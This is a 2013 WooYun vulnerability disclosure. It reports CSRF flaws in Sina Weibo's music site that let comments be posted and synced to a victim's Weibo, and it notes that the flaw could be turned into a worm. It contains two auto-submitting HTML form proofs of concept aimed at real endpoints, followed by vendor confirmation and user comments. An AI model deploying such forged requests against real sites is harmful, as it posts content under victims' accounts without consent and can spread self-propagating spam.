当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-020816

漏洞标题:sina微博某功能限制不严导致CSRF蠕虫

相关厂商:新浪

漏洞作者: se55i0n

提交时间:2013-03-28 11:37

修复时间:2013-05-12 11:38

公开时间:2013-05-12 11:38

漏洞类型:CSRF

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-03-28: 细节已通知厂商并且等待厂商处理中
2013-03-28: 厂商已经确认,细节仅向厂商公开
2013-04-07: 细节向核心白帽子及相关领域专家公开
2013-04-17: 细节向普通白帽子公开
2013-04-27: 细节向实习白帽子公开
2013-05-12: 细节向公众公开

简要描述:

sina微博csrf蠕虫

详细说明:

问题站点在于新浪的微博音乐人,http://music.weibo.com/,站点有个对某个音乐人或作品进行评价回复同时可以同步到自己的sina微博的功能,此处未校验referer导致;

1.png


一、第一处csrf
1)对音乐人的某个作品进行评价并同步到sina微博;

2.png


2)例子POC如下;

<html>
<body>
<form id="se55i0n" name="se55i0n" action="http://music.weibo.com/snake/port/snk_song_comment.php" method="POST">
<input type="text" name="songid" value="100027028" />
<input type="text" name="text" value="csrf is a bang!" />
<input type="text" name="towb" value="true">
<input type="submit" value="submit">
</form>
<script>
   document.se55i0n.submit();
</script>
</body>
</html>


3)执行效果见下图;

3.png


4)返回微博音乐人查看效果;

6.png


5)这里的回复的内容里过滤了http这个关键字,so,回复内容里无法带链接;

5.png


二、第二处csrf
1)在微博音乐人还有个功能就是,能对某个音乐人“说两句”并同步到自己的sina微博;

8 - Copy.png


2)这里可@任意人或多人一起@,内容能够自己定义且在回复内容中能够带上我们的http链接,这就为进一步的传播带来了基础,例子POC如下;

<html>
<body>
<form id="se55i0n" name="se55i0n" action="http://music.weibo.com/snake/port/snk_artist_sendComment.php" method="POST">
<input type="text" name="weiboid" value="3395246757380231" />
<input type="text" name="text" value="%40se55i0n%3A+go+go+go!http://www.baidu.com" />
<input type="text" name="toweibo" value="true">
<input type="submit" value="submit">
</form>
<script>
   document.se55i0n.submit();
</script>
</body>
</html>


3)运行POC效果;

7.png


4)返回微博查看效果;

10.png


漏洞证明:

见详细说明

修复方案:

你们专业

版权声明:转载请注明来源 se55i0n@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-03-28 11:46

厂商回复:

感谢提供,已安排人员进行修复。

最新状态:

暂无

漏洞评价:

评论

  1. 2013-03-28 11:42 | 带馅儿馒头 ( 普通白帽子 | Rank:1278 漏洞数:136 | 心在,梦在)

    话说新浪加V要收米米?

  2. 2013-03-28 12:57 | 苏南同学 ( 实习白帽子 | Rank:41 漏洞数:5 | 苏南同学,就是苏南同学~~~)

    又蠕动啦?

  3. 2013-03-28 13:04 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:172 )

    @苏南同学 小动了下,sina有给你送礼物么?

  4. 2013-03-29 07:15 | 雅柏菲卡 ( 普通白帽子 | Rank:1213 漏洞数:232 | 雙魚座聖鬥士雅柏菲卡)

    应该吃些驱虫药 才能够驱虫啊

  5. 2013-03-29 11:07 | 苏南同学 ( 实习白帽子 | Rank:41 漏洞数:5 | 苏南同学,就是苏南同学~~~)

    @se55i0n 没有,我啥都没有收到过 @新浪